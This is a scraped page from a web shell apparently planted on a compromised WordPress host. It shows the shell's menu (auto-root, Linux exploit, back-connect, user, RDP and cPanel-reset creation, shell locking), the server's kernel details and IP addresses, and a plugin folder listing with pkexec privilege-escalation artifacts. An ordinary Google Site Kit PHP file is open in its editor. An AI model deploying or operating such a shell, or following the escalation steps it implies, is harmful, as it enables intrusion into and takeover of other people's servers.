Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.133.145.136
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Core /
Conversion_Tracking /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Conversion_Event_Providers
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Conversion_Events_Provider.php
1.6
KB
-rw-r--r--
Conversion_Tracking.php
6.26
KB
-rw-r--r--
Conversion_Tracking_Settings.p...
1.63
KB
-rw-r--r--
REST_Conversion_Tracking_Contr...
2.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Conversion_Events_Provider.php
<?php /** * Class Google\Site_Kit\Core\Conversion_Tracking\Conversion_Events_Provider * * @package Google\Site_Kit\Core\Conversion_Tracking * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Assets\Script; /** * Base class for conversion events provider. * * @since 1.125.0 * @since 1.126.0 Changed from interface to abstract class. * @access private * @ignore */ abstract class Conversion_Events_Provider { /** * Plugin context. * * @since 1.126.0 * @var Context */ protected $context; /** * Constructor. * * @since 1.126.0 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Checks if the provider is active. * * @since 1.125.0 * * @return bool True if the provider is active, false otherwise. */ public function is_active() { return false; } /** * Gets the event names. * * @since 1.125.0 * * @return array List of event names. */ abstract public function get_event_names(); /** * Registers any actions/hooks for this provider. * * @since 1.129.0 */ public function register_hooks() { // No-op by default, but left here so subclasses can implement // their own `add_action`/hook calls. } /** * Registers the script for the provider. * * @since 1.125.0 * * @return Script Script instance. */ abstract public function register_script(); }
Close